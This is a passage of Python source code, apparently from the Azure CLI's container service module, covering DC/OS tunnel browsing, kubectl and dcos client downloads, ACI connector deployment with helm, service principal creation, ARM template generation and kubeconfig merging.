    :param disable_browser: If true, don't launch a web browser after establishing the proxy
:type disable_browser: bool
:param ssh_key_file: Path to the SSH key to use
:type ssh_key_file: string
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
_dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
if not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
acs = acs_client.ACSClient()
if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
key_filename=ssh_key_file):
raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))
octarine_bin = '/opt/mesosphere/bin/octarine'
if not acs.file_exists(octarine_bin):
raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))
proxy_id = _rand_str(16)
proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
acs.run(proxy_cmd, background=True)
# Parse the output to get the remote PORT
proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
stdout, _ = acs.run(proxy_client_cmd)
remote_port = int(stdout.read().decode().strip())
local_port = acs.get_available_local_port()
# Set the proxy
proxy.set_http_proxy('127.0.0.1', local_port)
logger.warning('Proxy running on 127.0.0.1:%s', local_port)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async('http://127.0.0.1')
try:
acs.create_tunnel(
remote_host='127.0.0.1',
remote_port=remote_port,
local_port=local_port)
finally:
proxy.disable_http_proxy()
return
def acs_install_cli(cmd, client, resource_group, name, install_location=None, client_version=None):
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group)
orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member
kwargs = {'install_location': install_location}
if client_version:
kwargs['client_version'] = client_version
if orchestrator_type == 'kubernetes':
return k8s_install_cli(**kwargs)
elif orchestrator_type == 'dcos':
return dcos_install_cli(**kwargs)
else:
raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
"""
Downloads the dcos command line from Mesosphere
"""
system = platform.system()
if not install_location:
raise CLIError(
"No install location specified and it could not be determined from the current platform '{}'".format(
system))
base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
if system == 'Windows':
file_url = base_url.format('windows', client_version, 'dcos.exe')
elif system == 'Linux':
# TODO Support ARM CPU here
file_url = base_url.format('linux', client_version, 'dcos')
elif system == 'Darwin':
file_url = base_url.format('darwin', client_version, 'dcos')
else:
        raise CLIError('Unsupported system "{}".'.format(system))
logger.warning('Downloading client to %s', install_location)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as err:
raise CLIError('Connection error while attempting to download client ({})'.format(err))
def k8s_install_cli(cmd, client_version='latest', install_location=None):
"""Install kubectl, a command-line interface for Kubernetes clusters."""
if client_version == 'latest':
context = _ssl_context()
version = urlopen('https://storage.googleapis.com/kubernetes-release/release/stable.txt',
context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = 'https://storage.googleapis.com/kubernetes-release/release/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
        raise CLIError('Unsupported system "{}".'.format(system))
logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError('Connection error while attempting to download client ({})'.format(ex))
if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def k8s_install_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("install", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def k8s_upgrade_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, service_principal=None, client_secret=None,
chart_url=None, os_type='Linux', image_tag=None, aci_resource_group=None):
_k8s_install_or_upgrade_connector("upgrade", cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group)
def _k8s_install_or_upgrade_connector(helm_cmd, cmd, client, name, resource_group_name, connector_name,
location, service_principal, client_secret, chart_url, os_type,
image_tag, aci_resource_group):
from subprocess import PIPE, Popen
instance = client.get(resource_group_name, name)
helm_not_installed = 'Helm not detected, please verify if it is installed.'
url_chart = chart_url
if image_tag is None:
image_tag = 'latest'
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# If SPN is specified, the secret should also be specified
if service_principal is not None and client_secret is None:
raise CLIError('--client-secret must be specified when --service-principal is specified')
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, aci_resource_group or resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
    # Validate the location against the ACI available regions
_validate_aci_location(norm_location)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
subscription_id = _get_subscription_id(cmd.cli_ctx)
# Get the TenantID
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, tenant_id = profile.get_login_credentials()
# Check if we want the linux connector
if os_type.lower() in ['linux', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Linux', instance.enable_rbac, instance.fqdn)
# Check if we want the windows connector
if os_type.lower() in ['windows', 'both']:
_helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, 'Windows', instance.enable_rbac, instance.fqdn)
def _helm_install_or_upgrade_aci_connector(helm_cmd, image_tag, url_chart, connector_name, service_principal,
client_secret, subscription_id, tenant_id, aci_resource_group,
norm_location, os_type, use_rbac, masterFqdn):
rbac_install = "true" if use_rbac else "false"
node_taint = 'azure.com/aci'
helm_release_name = connector_name.lower() + '-' + os_type.lower() + '-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
k8s_master = 'https://{}'.format(masterFqdn)
logger.warning("Deploying the ACI connector for '%s' using Helm", os_type)
try:
values = 'env.nodeName={},env.nodeTaint={},env.nodeOsType={},image.tag={},rbac.install={}'.format(
node_name, node_taint, os_type, image_tag, rbac_install)
if service_principal:
values += ",env.azureClientId=" + service_principal
if client_secret:
values += ",env.azureClientKey=" + client_secret
if subscription_id:
values += ",env.azureSubscriptionId=" + subscription_id
if tenant_id:
values += ",env.azureTenantId=" + tenant_id
if aci_resource_group:
values += ",env.aciResourceGroup=" + aci_resource_group
if norm_location:
values += ",env.aciRegion=" + norm_location
# Currently, we need to set the master FQDN.
# This is temporary and we should remove it when possible
values += ",env.masterUri=" + k8s_master
if helm_cmd == "install":
subprocess.call(["helm", "install", url_chart, "--name", helm_release_name, "--set", values])
elif helm_cmd == "upgrade":
subprocess.call(["helm", "upgrade", helm_release_name, url_chart, "--set", values])
except subprocess.CalledProcessError as err:
raise CLIError('Could not deploy the ACI connector Chart: {}'.format(err))
def k8s_uninstall_connector(cmd, client, name, resource_group_name, connector_name='aci-connector',
location=None, graceful=False, os_type='Linux'):
from subprocess import PIPE, Popen
helm_not_installed = "Error : Helm not detected, please verify if it is installed."
# Check if Helm is installed locally
try:
Popen(["helm"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(helm_not_installed)
# Get the credentials from a AKS instance
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# Validate if the RG exists
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
# Auto assign the location
if location is None:
location = rg_location
norm_location = location.replace(' ', '').lower()
if os_type.lower() in ['linux', 'both']:
helm_release_name = connector_name.lower() + '-linux-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
if os_type.lower() in ['windows', 'both']:
helm_release_name = connector_name.lower() + '-windows-' + norm_location
node_name = 'virtual-kubelet-' + helm_release_name
_undeploy_connector(graceful, node_name, helm_release_name)
def _undeploy_connector(graceful, node_name, helm_release_name):
if graceful:
logger.warning('Graceful option selected, will try to drain the node first')
from subprocess import PIPE, Popen
kubectl_not_installed = 'Kubectl not detected, please verify if it is installed.'
try:
Popen(["kubectl"], stdout=PIPE, stderr=PIPE)
except OSError:
raise CLIError(kubectl_not_installed)
try:
drain_node = subprocess.check_output(
['kubectl', 'drain', node_name, '--force', '--delete-local-data'],
universal_newlines=True)
if not drain_node:
raise CLIError('Could not find the node, make sure you' +
' are using the correct --os-type')
except subprocess.CalledProcessError as err:
raise CLIError('Could not find the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
logger.warning("Undeploying the '%s' using Helm", helm_release_name)
try:
subprocess.call(['helm', 'del', helm_release_name, '--purge'])
except subprocess.CalledProcessError as err:
raise CLIError('Could not undeploy the ACI connector Chart: {}'.format(err))
try:
subprocess.check_output(
['kubectl', 'delete', 'node', node_name],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not delete the node, make sure you are using the correct' +
' --connector-name, --location and --os-type options: {}'.format(err))
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _get_subscription_id(cli_ctx):
_, sub_id, _ = Profile(cli_ctx=cli_ctx).get_login_credentials(subscription_id=None)
return sub_id
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
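# Worked example with made-up inputs: non-alphanumeric characters are stripped
# and the parts are truncated, so the call below returns
# 'myCluster-my-rg-abcdef'.
def _example_default_dns_prefix():
    return _get_default_dns_prefix('myCluster!', 'my-rg',
                                   'abcdef12-3456-7890-abcd-ef1234567890')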
def list_acs_locations(cmd, client):
return {
"productionRegions": regions_in_prod,
"previewRegions": regions_in_preview
}
def _generate_windows_profile(windows, admin_username, admin_password):
if windows:
if not admin_password:
raise CLIError('--admin-password is required.')
if len(admin_password) < 6:
raise CLIError('--admin-password must be at least 6 characters')
windows_profile = {
"adminUsername": admin_username,
"adminPassword": admin_password,
}
return windows_profile
return None
def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile):
master_pool_profile = {}
default_master_pool_profile = {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
}
if api_version == "2017-07-01":
default_master_pool_profile = _update_dict(default_master_pool_profile, {
"count": int(master_count),
"dnsPrefix": dns_name_prefix + 'mgmt',
"vmSize": master_vm_size,
"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
    'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
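# Hedged round-trip sketch for the two helpers above; the subscription id,
# secret and service principal values are placeholders, and the record is
# written to acsServicePrincipal.json under get_config_dir().
def _example_service_principal_round_trip():
    sub_id = '00000000-0000-0000-0000-000000000000'
    store_acs_service_principal(sub_id, 'example-secret', 'http://example-sp')
    return load_acs_service_principal(sub_id)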
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if addition[key]:
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
raise CLIError('A different object named {} already exists in {}'.format(i['name'], key))
existing[key].append(i)
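# Illustrative sketch (hypothetical helper, placeholder data): _handle_merge semantics
# for a same-named entry. With replace=False a conflicting duplicate raises CLIError;
# with replace=True (or when the entries are identical) the addition wins.
def _example_handle_merge():
    existing = {'clusters': [{'name': 'aks1', 'cluster': {'server': 'https://old.example'}}]}
    addition = {'clusters': [{'name': 'aks1', 'cluster': {'server': 'https://new.example'}}]}
    _handle_merge(existing, addition, 'clusters', replace=True)
    assert existing['clusters'] == addition['clusters']
    return existing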
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
else:
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
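# Illustrative sketch (hypothetical helper, placeholder path): merging a freshly
# downloaded kubeconfig into the default ~/.kube/config. replace=False keeps existing
# same-named clusters/users/contexts and errors on conflicting duplicates.
def _example_merge_downloaded_kubeconfig(downloaded_path='/tmp/aks-cluster.kubeconfig'):
    default_path = os.path.join(os.path.expanduser('~'), '.kube', 'config')
    try:
        merge_kubernetes_configurations(default_path, downloaded_path, replace=False)
    except yaml.YAMLError as exc:
        logger.warning('Failed to merge %s into %s: %s', downloaded_path, default_path, exc)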
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
